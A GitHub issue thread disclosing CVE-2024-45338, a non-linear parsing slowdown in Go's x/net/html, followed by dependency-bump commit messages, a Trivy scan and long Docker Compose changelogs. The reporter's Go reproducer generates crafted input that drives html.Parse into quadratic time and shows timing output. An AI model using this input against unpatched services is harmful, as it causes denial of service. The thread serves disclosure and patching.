x/net/html: non-linear parsing of case-insensitive content #70906

rolandshoemaker · 2024-12-18T16:09:01Z

An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing.

Thanks to Guido Vranken for reporting this issue.

This is CVE-2024-45338.

gopherbot · 2024-12-18T19:21:18Z

Change https://go.dev/cl/637536 mentions this issue: html: use strings.EqualFold instead of lowering ourselves

golang/go#70906 Signed-off-by: Guillaume Lours <705411+glours@users.noreply.github.com>

A high vulnerability(CVE-2024-45338)[1] is resolved in golang.org/x/net v0.33.0[2] Update to this verion. [1] https://nvd.nist.gov/vuln/detail/CVE-2024-45338 [2] golang/go#70906 Signed-off-by: Brian Carey <bcarey@redhat.com>

*Issue #, if available:* golang/go#70906 *Description of changes:* This change updates the version of the net/html package provided by the Golang project. By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice. Signed-off-by: Daniel Carl Jones <djonesoa@amazon.com>

Reference: - [CVE-2024-45338](GHSA-w32m-9786-jp63) - [x/net/html: non-linear parsing of case-insensitive content golang/go#70906](golang/go#70906)

guidovranken · 2024-12-20T21:08:58Z

The following reproducer prints the execution time of html.Parse() to process 1, 2, 4, 8, 16, 32, 64, 128, 256, 512 and 1024 kilobytes of crafted input.

package main

import (
    "golang.org/x/net/html"
    "strings"
    "bytes"
    "fmt"
    "time"
)

func generate(size int) []byte {
    size1 := size / 2
    size2 := size / 8
    out := []byte("<math><Annotation-xml encoding=")
    out = append(out, bytes.Repeat([]byte{0xFF}, size1)...)
    out = append(out, bytes.Repeat([]byte("><</"), size2)...)
    return out
}

func main() {
    for kb := 1; kb <= 1024; kb *= 2 {
        data := generate(1024 * kb)
        start := time.Now()
        html.Parse(strings.NewReader(string(data)))
        duration := time.Since(start)
        fmt.Printf("Parsing %d kb took %s\n", kb, duration)
    }
}

Output on AMD Ryzen 5 5600G, Linux x64 using go1.23.2 linux/amd64 (from https://go.dev/dl/go1.23.2.linux-amd64.tar.gz)

Parsing 1 kb took 3.08939ms
Parsing 2 kb took 11.730778ms
Parsing 4 kb took 37.71703ms
Parsing 8 kb took 146.944095ms
Parsing 16 kb took 605.988269ms
Parsing 32 kb took 2.341168259s
Parsing 64 kb took 9.875122735s
Parsing 128 kb took 41.930787863s
Parsing 256 kb took 2m59.680417561s
Parsing 512 kb took 12m2.349134038s
Parsing 1024 kb took 47m38.232269575s

golang/go#70906 Signed-off-by: Guillaume Lours <705411+glours@users.noreply.github.com>

No evidence that these CVEs were actually exploitable in any way, I believe they're false positives. The CVEs are: - CVE-2024-51744 (github.com/golang-jwt/jwt/v4) - CVE-2024-45338 (x/net) - CVE-2024-45337 (x/crypto) Trivy output before this PR: ```json { "SchemaVersion": 2, "CreatedAt": "2025-01-09T12:23:03.224784Z", "ArtifactName": ".", "ArtifactType": "filesystem", "Metadata": { "ImageConfig": { "architecture": "", "created": "0001-01-01T00:00:00Z", "os": "", "rootfs": { "type": "", "diff_ids": null }, "config": {} } }, "Results": [ { "Target": "go.mod", "Class": "lang-pkgs", "Type": "gomod", "Vulnerabilities": [ { "VulnerabilityID": "CVE-2024-51744", "PkgID": "github.com/golang-jwt/jwt/v4@v4.5.0", "PkgName": "github.com/golang-jwt/jwt/v4", "PkgIdentifier": { "PURL": "pkg:golang/github.com/golang-jwt/jwt/v4@v4.5.0", "UID": "fcf0d6f346ee1743" }, "InstalledVersion": "v4.5.0", "FixedVersion": "4.5.1", "Status": "fixed", "Layer": {}, "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-51744", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory Go", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Ago" }, "Title": "golang-jwt: Bad documentation of error handling in ParseWithClaims can lead to potentially dangerous situations in golang-jwt", "Description": "golang-jwt is a Go implementation of JSON Web Tokens. Unclear documentation of the error behavior in `ParseWithClaims` can lead to situation where users are potentially not checking errors in the way they should be. Especially, if a token is both expired and invalid, the errors returned by `ParseWithClaims` return both error codes. If users only check for the `jwt.ErrTokenExpired ` using `error.Is`, they will ignore the embedded `jwt.ErrTokenSignatureInvalid` and thus potentially accept invalid tokens. A fix has been back-ported with the error handling logic from the `v5` branch to the `v4` branch. In this logic, the `ParseWithClaims` function will immediately return in \"dangerous\" situations (e.g., an invalid signature), limiting the combined errors only to situations where the signature is valid, but further validation failed (e.g., if the signature is valid, but is expired AND has the wrong audience). This fix is part of the 4.5.1 release. We are aware that this changes the behaviour of an established function and is not 100 % backwards compatible, so updating to 4.5.1 might break your code. In case you cannot update to 4.5.0, please make sure that you are properly checking for all errors (\"dangerous\" ones first), so that you are not running in the case detailed above.", "Severity": "LOW", "CweIDs": [ "CWE-755" ], "VendorSeverity": { "ghsa": 1, "redhat": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 3.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 3.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-51744", "https://github.com/golang-jwt/jwt", "golang-jwt/jwt@7b1c1c0", "GHSA-29wx-vh33-7x7r", "https://nvd.nist.gov/vuln/detail/CVE-2024-51744", "https://www.cve.org/CVERecord?id=CVE-2024-51744" ], "PublishedDate": "2024-11-04T22:15:03.997Z", "LastModifiedDate": "2024-11-05T16:04:26.053Z" }, { "VulnerabilityID": "CVE-2024-45337", "PkgID": "golang.org/x/crypto@v0.24.0", "PkgName": "golang.org/x/crypto", "PkgIdentifier": { "PURL": "pkg:golang/golang.org/x/crypto@v0.24.0", "UID": "1e2401ae941babb7" }, "InstalledVersion": "v0.24.0", "FixedVersion": "0.31.0", "Status": "fixed", "Layer": {}, "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-45337", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory Go", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Ago" }, "Title": "golang.org/x/crypto/ssh: Misuse of ServerConfig.PublicKeyCallback may cause authorization bypass in golang.org/x/crypto", "Description": "Applications and libraries which misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass. The documentation for ServerConfig.PublicKeyCallback says that \"A call to this function does not guarantee that the key offered is in fact used to authenticate.\" Specifically, the SSH protocol allows clients to inquire about whether a public key is acceptable before proving control of the corresponding private key. PublicKeyCallback may be called with multiple keys, and the order in which the keys were provided cannot be used to infer which key the client successfully authenticated with, if any. Some applications, which store the key(s) passed to PublicKeyCallback (or derived information) and make security relevant determinations based on it once the connection is established, may make incorrect assumptions. For example, an attacker may send public keys A and B, and then authenticate with A. PublicKeyCallback would be called only twice, first with A and then with B. A vulnerable application may then make authorization decisions based on key B for which the attacker does not actually control the private key. Since this API is widely misused, as a partial mitigation golang.org/x/cry...@v0.31.0 enforces the property that, when successfully authenticating via public key, the last key passed to ServerConfig.PublicKeyCallback will be the key used to authenticate the connection. PublicKeyCallback will now be called multiple times with the same key, if necessary. Note that the client may still not control the last key passed to PublicKeyCallback if the connection is then authenticated with a different method, such as PasswordCallback, KeyboardInteractiveCallback, or NoClientAuth. Users should be using the Extensions field of the Permissions return value from the various authentication callbacks to record data associated with the authentication attempt instead of referencing external state. Once the connection is established the state corresponding to the successful authentication attempt can be retrieved via the ServerConn.Permissions field. Note that some third-party libraries misuse the Permissions type by sharing it across authentication attempts; users of third-party libraries should refer to the relevant projects for guidance.", "Severity": "CRITICAL", "VendorSeverity": { "azure": 4, "cbl-mariner": 4, "ghsa": 4, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "V3Score": 9.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N", "V3Score": 8.2 } }, "References": [ "http://www.openwall.com/lists/oss-security/2024/12/11/2", "https://access.redhat.com/security/cve/CVE-2024-45337", "https://github.com/golang/crypto", "golang/crypto@b4f1988", "https://go.dev/cl/635315", "https://go.dev/issue/70779", "https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ", "https://nvd.nist.gov/vuln/detail/CVE-2024-45337", "https://pkg.go.dev/vuln/GO-2024-3321", "https://www.cve.org/CVERecord?id=CVE-2024-45337" ], "PublishedDate": "2024-12-12T02:02:07.97Z", "LastModifiedDate": "2024-12-12T21:15:08.5Z" }, { "VulnerabilityID": "CVE-2024-45338", "PkgID": "golang.org/x/net@v0.26.0", "PkgName": "golang.org/x/net", "PkgIdentifier": { "PURL": "pkg:golang/golang.org/x/net@v0.26.0", "UID": "eef2f1c0560c161f" }, "InstalledVersion": "v0.26.0", "FixedVersion": "0.33.0", "Status": "fixed", "Layer": {}, "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-45338", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory Go", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Ago" }, "Title": "golang.org/x/net/html: Non-linear parsing of case-insensitive content in golang.org/x/net/html", "Description": "An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This could cause a denial of service.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "ghsa": 3, "redhat": 3, "ubuntu": 2 }, "CVSS": { "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-45338", "https://cs.opensource.google/go/x/net", "golang/go#70906", "https://go-review.googlesource.com/c/net/+/637536", "https://go.dev/cl/637536", "https://go.dev/issue/70906", "https://groups.google.com/g/golang-announce/c/wSCRmFnNmPA/m/Lvcd0mRMAwAJ", "https://nvd.nist.gov/vuln/detail/CVE-2024-45338", "https://pkg.go.dev/vuln/GO-2024-3333", "https://www.cve.org/CVERecord?id=CVE-2024-45338" ], "PublishedDate": "2024-12-18T21:15:08.173Z", "LastModifiedDate": "2024-12-31T20:16:06.603Z" } ] }, { "Target": "make/_shared/oci-build/image_tool/go.mod", "Class": "lang-pkgs", "Type": "gomod" } ] } ``` Signed-off-by: Ashley Davis <ashley.davis@venafi.com>

…32.2 Bumping compose to version v2.26.1-287-gfa3950346, which comprises the following commits: fa3950346 image can be set to a local ID, that isn't a valid docker ref a35158502 can't render progress concurrently with buildkit b6db1380e exclude one-off container running convergence 2ebb47543 Only override service mac if set on the main network. d474515d4 remove engine v25 from e2e test matrix The 1st version available for Ubuntu 24.x is Docker Engine v26 2b21c5df9 fix relative path in compose file 1f3c10eb4 bump compose-go to v2.4.7 68ad165a5 replace tibdex/github-app-token by official GitHub create-github-app-token 3060ed279 bump golang.org/x/net to v0.33.0 to fix potential security issue golang/go#70906 be09b2e8c checkExpectedVolumes must ignore anonymous volumes 571a1af01 When retrying to resolveOrCreateNetwork, retry with a valid network name 8f644eea7 only check bind mount conflict if sync action is involved 56e92e34b use the 3 latest major versions of the engine to run e2e step a42a04dfe bump Golang version to v1.22.10 and update CI actions 34bcd03a7 add --pull to run command ed61e42f9 CI to validate fmt 65696bb1c `make fmt` so any contributor can enforce formatting 446e00520 format code with gofumpt c01c9c29f e2e test to prevent future regression 038c81f34 only check volume mounts for updated config a20b69ac5 e2e test for recreate volume 977530c22 build(deps): bump google.golang.org/grpc from 1.68.0 to 1.68.1 d4db8b6b1 build(deps): bump golang.org/x/crypto from 0.27.0 to 0.31.0 f8ce0f04e build(deps): bump golang.org/x/sys from 0.27.0 to 0.28.0 8e0520e71 prompt user to confirm volume recreation 332311358 Recreate container on volume configuration change df9e420dd introduce watch restart action 142f5dba8 bump otel dependencies to v1.28.0 and v0.53.0 to align with buildx, buildkit and engine versions 700c586bc bump docker/buildx to latest release fc566509d fix support for service.mac_address e73c2303f update xx to v1.6.1 for compatibility with alpine 3.21 and file 5.46+ 624303233 build(deps): bump golang.org/x/sync from 0.9.0 to 0.10.0 a1729c52d Update pkg/e2e/watch_test.go 254224c18 first watch action for a file event wins 0861e6845 fix af5b74850 revisit TestDebounceBatching 32a22c1f4 introduce sync+exec watch action e6ea8fb96 log configuration error as a watch log event 043465448 do not require a build section but for `rebuild` action 1d0839086 pull --quiet should not drop status message, only progress 69a83d130 use latest engine tags 781b9f1cd Bump buildx to 0.19.1 cbff0e555 be sure everything has been cleanup at the end of each tests e4222bff5 add local config.json to test configuration dir if exists 25197fe6d disable failing TestBuildSSH test 85cdaf9dd fix build with bake a8469db83 bump containerd to v1.7,24 08488dae5 bump google.golang.org/grpc to v1.68.0 cc3a216f2 build(deps): bump github.com/moby/buildkit from 0.17.1 to 0.17.2 6e818b9ae build(deps): bump github.com/compose-spec/compose-go/v2 6b3e57503 only stop dependent containers ... if there's some 8e497a128 disable TestNetworkConfigChanged which is unstable on CI 5aed70437 only check attached networks on running containers 1ff9b758d fix: commit tests 9eaba5597 feat: add commit command a85f8a40a run build tests against bake 095f65cb4 delegate build to buildx bake 208e57ded build(deps): bump github.com/stretchr/testify from 1.9.0 to 1.10.0 2d148faed use service.stop to stop dependent containers 43ac1e31c Update wait-timeout flag usage to include the unit 5561a778c go.mod: github.com/docker/cli v27.4.0-rc.2 ae48f488d go.mod: github.com/docker/docker v27.4.0-rc.2 5e3a09538 go.mod: github.com/docker/cli 8d1bacae3e49 (v27.4.0-rc.2-dev) a2a3eb72e go.mod: github.com/docker/cli v27.4.0-rc.1 3513b4242 go.mod: github.com/docker/docker v27.4.0-rc.1 d4fa63fdc Update pkg/compose/convergence.go c21d4cfb4 detect network config changes and recreate if needed 61f1d4f69 go.mod: github.com/docker/buildx v0.18.0 f7cce281d go.mod: github.com/moby/buildkit v0.17.1 bcaacc7f2 gha: test against docker engine v27.4.0 3f5898f8d push empty descriptor layer when using OCI version 1.1 for Compose artifact it fixes a repository creation issue when pushing the 1st time a Compose OCI artifact on the Hub 2bb67f270 remove ddev e2e tests bf521fe3a implement remove-orphans on run 11e9621da ci: enable testifylint linter a9de9abcf Emit events for building images 799ab842a Fix compose images that reutn a different image with the same ID 2f65ace2a remove obsolete containers first on scale down aa0a4189e pass stal bot inactivity limit from 6 to 3 months eba3ff8f3 fix(config): Print service names with --no-interpolate 6313365ba build(deps): bump golang.org/x/sys from 0.26.0 to 0.27.0 dbd51745c build(deps): bump golang.org/x/sync from 0.8.0 to 0.9.0 a8bfbc147 bump compose-go v2.4.4 fbbd6f83d Avoid starting all services on rebuild a00097898 remove ArtifactType from Config in OCI v1.1 definition of the artifact 361c0893a build(deps): bump github.com/compose-spec/compose-go/v2 513b6128c Service being declared in a profile must not trigger re-creation eececb9ad Add profile e2e test case to document in compose 501b5acde Update `MAINTAINERS` file f51bc4cd0 bump compose-go to version v2.4.2 517f87a37 bump google.golang.org/grpc to v1.67.1 718049cbd bump go.uber.org/mock to v0.5.0 02371f312 bump golang minimal version to 1.22 in go.mod a7c9de82b build(deps): bump github.com/containerd/containerd from 1.7.22 to 1.7.23 51ebeb544 introduce generate command as alpha command fafaa9c5b bump compose-go to version v2.4.1 fc9c3cde0 Add license header to dockerignore_test.go 73bfbab54 fix 2ac081b4c fix(dockerignore): Add wildcard support to dockerignore.go eeea049f1 push: Fix error message typo 26064d4b6 allow usage of -f flag with oci Compose artifact 7c46beb8a resurrect --all flag for cp to target oneoff container aa1ec4524 connect to external networks by name a4ee6ca7a don't warn about uid/gid not being supported while ... they are 5617eff0c bump compose-go to v2.4.0 fa24ab8e2 one-off container are not indexed, and must be ignored by exec --index command 0aad9595a don't use progress to render restart, which hides logs 813900180 compose-go clean volume target to avoid ambiguous comparisons 82417bd5b add support for bind.recursive 0cbb73c02 Improve error message to include expected network label 38e3d670a desktop: allow this client to be identified via user-agent 24c78728e bump compose-go to v2.3.0 9eeb2d315 convert gpus to DeviceRequests with implicit "gpu" capability 8da82c98e gha: set default permissions to "contents: read" 1a8c85548 Add security policy 15bd0b0c5 add support for raw env_file format 39d0f6477 build(deps): bump golang.org/x/sys from 0.25.0 to 0.26.0 3a95a0872 add support for CDI device request using `devices` f794c79eb Support Dockerfile-specific ignore-file with watch 407d82570 Remove feature flag integration with Docker Desktop for ComposeUI and ComposeNav 82b41b9eb introduce service hooks 6c06170eb pass device.options to engine 60c1311f6 chore: remove errors depricated pkg 17add87e4 fix: validate-go-mod bf0418bac fix: lint b9d0c77cd feat: add export command bdb854561 fix(convergence): Serialize access to observed state 41df35c1f Remove bind options when creating a volume type 3ef5045a0 Bump docker v27.3.1 d9df7aab6 fix(push): Fix unexpected EOF on alpha publish c9d96b449 use compose-go version fixing extra_hosts unicity issue 1744b4576 Show watch error message and open DD only when w is pressed 87f457e7d add tests to down.go abcc91e2b fix(down): Fix down command if specified services are not running 8b9fe8984 After container restart register printer consumer 34b18194f check secret source exists, as bind mount would create target as a folder otherwise ce27dba52 wait for dependent service up to delay set by --wait-timeout d2b945613 append unix-style relative path when computing container target path 9c60fe67d revert commits link to mount API over bind changes c16df17e1 don't set propagation if target engine isn't linux 20404db12 build(deps): bump github.com/docker/docker v27.3.0-rc.2 f2ff7fd75 build(deps): bump github.com/docker/cli v27.3.0-rc.2 cb00aaad2 set propagation default e885bc084 Remove custom codeql workflow 73d3a25eb fix import 3524bcfad chore(watch): Add debug log when skipping service without build context 1076f1d9a stop dependent containers before recreating diverged service 16652ed26 Fixed possible `nil` pointer dereference c6a76b9bd bump github.com/docker/buildx v0.17.1 3a0e3ba7e build(deps): bump docker, docker/cli to v27.3.0-rc.1 86ef8e62c gha: test against docker engine v27.3.0 8bf0627ea show sync files only in debug level 2e1419168 chore(watch): Add changed files path/count to log 155f64182 build(deps): bump golang.org/x/sync from 0.7.0 to 0.8.0 8db0cba0a bump compose-go to version v2.2.0 a7424435b Restore compose v1 behavior to recreate containers when ran with -V d445ebba3 fix linting issues with golangci-lint 1.60.2 f592aad10 bump golang to version 1.22.7 ef46445ed bump dependencies versions, engine and cli v27.2.1 containerd v1.7.22 buildx v0.17.0 buildkit v0.16.0 150593298 build(deps): bump golang.org/x/sys from 0.22.0 to 0.25.0 524a97e55 Fix typos 1d608e033 Use logrus instead of direct output to stderr. 329ad7392 attach: close streams when done b633c5c3e Fix typo in pull.go e6ef8629a Allow combination of bind mounts and 'rebuild' watches d658fecc6 service hash must exlude depends_on f9c7a0cc0 prefer mount API over bind 6e172d6b8 docs: duplicate documentation for root cmd 98e261ba3 docs(wait): Fix wait command description 11c7a25ae allow to add empty line in the logs when nav menu activated 234036756 upgrade docker versions 9c03797f9 initial sync files that modified after image creation 485c0eba5 initial sync for root directory 69384a9a0 Removes redundant condition from toAPIBuildOptions in build.go 1601ead7b docs: Update docker compose kill usage ea4ccf639 Fix stop on file chane for sync-restart action b1850ea4d bump engine and cli to v27.1.1, buildx to v0.16.1 adba639e8 remove all dependabot update PRs for OTel dependencies d8518529c gp.mod: github.com/gofrs/flock v0.12.1 c79f15da9 go.mod: golang.org/x/sys v0.22.0 3f55382ff update to go1.21.12 44337d2bb Enhance JSON progress events with more fields. bc733508d bump compose-go v2.1.5 c422b5447 bump github.com/docker/cli v27.1.0 e74441c90 bump github.com/docker/docker v27.1.0 2bac32a46 bump github.com/containerd/containerd v1.7.20 f278400fb gha: add docker 27.1.0 4f9db4d3e fix(containers): fix sorting logic by adding secondary sorting for one-off containers 06bf339a4 fix: typos 231ea1005 update docs generation to avoid man pages generation 46679150d bump compose-go to v2.1.4, buildx to v0.16.0, containerd to v1.7.19 and buildx to v0.15.0 d3d378b92 restore setEnvWithDotEnv 163cdfd31 empty env variable with no value must be unset in container 25f85938b exclude unnecessary resources after services have been selected cacbca859 change time for stale bot ecac13f27 Remove debug mode and run twice a week 14793cc2e Add stale workflow 11d5ecdc7 update docs 9549a213b feat(watch): Add --prune option to docker-compose watch command da434013e Remove COMPOSE_MENU env from e2e tests ace69c96a Use rawjson for the build backend. 2db04c1e4 Set logging format to JSON. 8f7cd0048 Format errors as JSON when in JSON progress mode. 5a6e1a7e2 Pass 'plain' instead of 'json' to build backend 06545d066 Add JSON stream progress writer 075fd9345 go.mod: docker/cli, docker/docker v27.0.3 d062ad739 gha: test against docker v27.0.3 7cd5209cc go.mod: docker/cli, docker/docker v27.0.2 f79c28168 Remove `console.Terminal` check and use `IsTerminal` from `streams.Out` Signed-off-by: Bruce Ashfield <bruce.ashfield@gmail.com>

…for merge: update to v2.32.2 Bumping compose to version v2.26.1-287-gfa3950346, which comprises the following commits: fa3950346 image can be set to a local ID, that isn't a valid docker ref a35158502 can't render progress concurrently with buildkit b6db1380e exclude one-off container running convergence 2ebb47543 Only override service mac if set on the main network. d474515d4 remove engine v25 from e2e test matrix The 1st version available for Ubuntu 24.x is Docker Engine v26 2b21c5df9 fix relative path in compose file 1f3c10eb4 bump compose-go to v2.4.7 68ad165a5 replace tibdex/github-app-token by official GitHub create-github-app-token 3060ed279 bump golang.org/x/net to v0.33.0 to fix potential security issue golang/go#70906 be09b2e8c checkExpectedVolumes must ignore anonymous volumes 571a1af01 When retrying to resolveOrCreateNetwork, retry with a valid network name 8f644eea7 only check bind mount conflict if sync action is involved 56e92e34b use the 3 latest major versions of the engine to run e2e step a42a04dfe bump Golang version to v1.22.10 and update CI actions 34bcd03a7 add --pull to run command ed61e42f9 CI to validate fmt 65696bb1c `make fmt` so any contributor can enforce formatting 446e00520 format code with gofumpt c01c9c29f e2e test to prevent future regression 038c81f34 only check volume mounts for updated config a20b69ac5 e2e test for recreate volume 977530c22 build(deps): bump google.golang.org/grpc from 1.68.0 to 1.68.1 d4db8b6b1 build(deps): bump golang.org/x/crypto from 0.27.0 to 0.31.0 f8ce0f04e build(deps): bump golang.org/x/sys from 0.27.0 to 0.28.0 8e0520e71 prompt user to confirm volume recreation 332311358 Recreate container on volume configuration change df9e420dd introduce watch restart action 142f5dba8 bump otel dependencies to v1.28.0 and v0.53.0 to align with buildx, buildkit and engine versions 700c586bc bump docker/buildx to latest release fc566509d fix support for service.mac_address e73c2303f update xx to v1.6.1 for compatibility with alpine 3.21 and file 5.46+ 624303233 build(deps): bump golang.org/x/sync from 0.9.0 to 0.10.0 a1729c52d Update pkg/e2e/watch_test.go 254224c18 first watch action for a file event wins 0861e6845 fix af5b74850 revisit TestDebounceBatching 32a22c1f4 introduce sync+exec watch action e6ea8fb96 log configuration error as a watch log event 043465448 do not require a build section but for `rebuild` action 1d0839086 pull --quiet should not drop status message, only progress 69a83d130 use latest engine tags 781b9f1cd Bump buildx to 0.19.1 cbff0e555 be sure everything has been cleanup at the end of each tests e4222bff5 add local config.json to test configuration dir if exists 25197fe6d disable failing TestBuildSSH test 85cdaf9dd fix build with bake a8469db83 bump containerd to v1.7,24 08488dae5 bump google.golang.org/grpc to v1.68.0 cc3a216f2 build(deps): bump github.com/moby/buildkit from 0.17.1 to 0.17.2 6e818b9ae build(deps): bump github.com/compose-spec/compose-go/v2 6b3e57503 only stop dependent containers ... if there's some 8e497a128 disable TestNetworkConfigChanged which is unstable on CI 5aed70437 only check attached networks on running containers 1ff9b758d fix: commit tests 9eaba5597 feat: add commit command a85f8a40a run build tests against bake 095f65cb4 delegate build to buildx bake 208e57ded build(deps): bump github.com/stretchr/testify from 1.9.0 to 1.10.0 2d148faed use service.stop to stop dependent containers 43ac1e31c Update wait-timeout flag usage to include the unit 5561a778c go.mod: github.com/docker/cli v27.4.0-rc.2 ae48f488d go.mod: github.com/docker/docker v27.4.0-rc.2 5e3a09538 go.mod: github.com/docker/cli 8d1bacae3e49 (v27.4.0-rc.2-dev) a2a3eb72e go.mod: github.com/docker/cli v27.4.0-rc.1 3513b4242 go.mod: github.com/docker/docker v27.4.0-rc.1 d4fa63fdc Update pkg/compose/convergence.go c21d4cfb4 detect network config changes and recreate if needed 61f1d4f69 go.mod: github.com/docker/buildx v0.18.0 f7cce281d go.mod: github.com/moby/buildkit v0.17.1 bcaacc7f2 gha: test against docker engine v27.4.0 3f5898f8d push empty descriptor layer when using OCI version 1.1 for Compose artifact it fixes a repository creation issue when pushing the 1st time a Compose OCI artifact on the Hub 2bb67f270 remove ddev e2e tests bf521fe3a implement remove-orphans on run 11e9621da ci: enable testifylint linter a9de9abcf Emit events for building images 799ab842a Fix compose images that reutn a different image with the same ID 2f65ace2a remove obsolete containers first on scale down aa0a4189e pass stal bot inactivity limit from 6 to 3 months eba3ff8f3 fix(config): Print service names with --no-interpolate 6313365ba build(deps): bump golang.org/x/sys from 0.26.0 to 0.27.0 dbd51745c build(deps): bump golang.org/x/sync from 0.8.0 to 0.9.0 a8bfbc147 bump compose-go v2.4.4 fbbd6f83d Avoid starting all services on rebuild a00097898 remove ArtifactType from Config in OCI v1.1 definition of the artifact 361c0893a build(deps): bump github.com/compose-spec/compose-go/v2 513b6128c Service being declared in a profile must not trigger re-creation eececb9ad Add profile e2e test case to document in compose 501b5acde Update `MAINTAINERS` file f51bc4cd0 bump compose-go to version v2.4.2 517f87a37 bump google.golang.org/grpc to v1.67.1 718049cbd bump go.uber.org/mock to v0.5.0 02371f312 bump golang minimal version to 1.22 in go.mod a7c9de82b build(deps): bump github.com/containerd/containerd from 1.7.22 to 1.7.23 51ebeb544 introduce generate command as alpha command fafaa9c5b bump compose-go to version v2.4.1 fc9c3cde0 Add license header to dockerignore_test.go 73bfbab54 fix 2ac081b4c fix(dockerignore): Add wildcard support to dockerignore.go eeea049f1 push: Fix error message typo 26064d4b6 allow usage of -f flag with oci Compose artifact 7c46beb8a resurrect --all flag for cp to target oneoff container aa1ec4524 connect to external networks by name a4ee6ca7a don't warn about uid/gid not being supported while ... they are 5617eff0c bump compose-go to v2.4.0 fa24ab8e2 one-off container are not indexed, and must be ignored by exec --index command 0aad9595a don't use progress to render restart, which hides logs 813900180 compose-go clean volume target to avoid ambiguous comparisons 82417bd5b add support for bind.recursive 0cbb73c02 Improve error message to include expected network label 38e3d670a desktop: allow this client to be identified via user-agent 24c78728e bump compose-go to v2.3.0 9eeb2d315 convert gpus to DeviceRequests with implicit "gpu" capability 8da82c98e gha: set default permissions to "contents: read" 1a8c85548 Add security policy 15bd0b0c5 add support for raw env_file format 39d0f6477 build(deps): bump golang.org/x/sys from 0.25.0 to 0.26.0 3a95a0872 add support for CDI device request using `devices` f794c79eb Support Dockerfile-specific ignore-file with watch 407d82570 Remove feature flag integration with Docker Desktop for ComposeUI and ComposeNav 82b41b9eb introduce service hooks 6c06170eb pass device.options to engine 60c1311f6 chore: remove errors depricated pkg 17add87e4 fix: validate-go-mod bf0418bac fix: lint b9d0c77cd feat: add export command bdb854561 fix(convergence): Serialize access to observed state 41df35c1f Remove bind options when creating a volume type 3ef5045a0 Bump docker v27.3.1 d9df7aab6 fix(push): Fix unexpected EOF on alpha publish c9d96b449 use compose-go version fixing extra_hosts unicity issue 1744b4576 Show watch error message and open DD only when w is pressed 87f457e7d add tests to down.go abcc91e2b fix(down): Fix down command if specified services are not running 8b9fe8984 After container restart register printer consumer 34b18194f check secret source exists, as bind mount would create target as a folder otherwise ce27dba52 wait for dependent service up to delay set by --wait-timeout d2b945613 append unix-style relative path when computing container target path 9c60fe67d revert commits link to mount API over bind changes c16df17e1 don't set propagation if target engine isn't linux 20404db12 build(deps): bump github.com/docker/docker v27.3.0-rc.2 f2ff7fd75 build(deps): bump github.com/docker/cli v27.3.0-rc.2 cb00aaad2 set propagation default e885bc084 Remove custom codeql workflow 73d3a25eb fix import 3524bcfad chore(watch): Add debug log when skipping service without build context 1076f1d9a stop dependent containers before recreating diverged service 16652ed26 Fixed possible `nil` pointer dereference c6a76b9bd bump github.com/docker/buildx v0.17.1 3a0e3ba7e build(deps): bump docker, docker/cli to v27.3.0-rc.1 86ef8e62c gha: test against docker engine v27.3.0 8bf0627ea show sync files only in debug level 2e1419168 chore(watch): Add changed files path/count to log 155f64182 build(deps): bump golang.org/x/sync from 0.7.0 to 0.8.0 8db0cba0a bump compose-go to version v2.2.0 a7424435b Restore compose v1 behavior to recreate containers when ran with -V d445ebba3 fix linting issues with golangci-lint 1.60.2 f592aad10 bump golang to version 1.22.7 ef46445ed bump dependencies versions, engine and cli v27.2.1 containerd v1.7.22 buildx v0.17.0 buildkit v0.16.0 150593298 build(deps): bump golang.org/x/sys from 0.22.0 to 0.25.0 524a97e55 Fix typos 1d608e033 Use logrus instead of direct output to stderr. 329ad7392 attach: close streams when done b633c5c3e Fix typo in pull.go e6ef8629a Allow combination of bind mounts and 'rebuild' watches d658fecc6 service hash must exlude depends_on f9c7a0cc0 prefer mount API over bind 6e172d6b8 docs: duplicate documentation for root cmd 98e261ba3 docs(wait): Fix wait command description 11c7a25ae allow to add empty line in the logs when nav menu activated 234036756 upgrade docker versions 9c03797f9 initial sync files that modified after image creation 485c0eba5 initial sync for root directory 69384a9a0 Removes redundant condition from toAPIBuildOptions in build.go 1601ead7b docs: Update docker compose kill usage ea4ccf639 Fix stop on file chane for sync-restart action b1850ea4d bump engine and cli to v27.1.1, buildx to v0.16.1 adba639e8 remove all dependabot update PRs for OTel dependencies d8518529c gp.mod: github.com/gofrs/flock v0.12.1 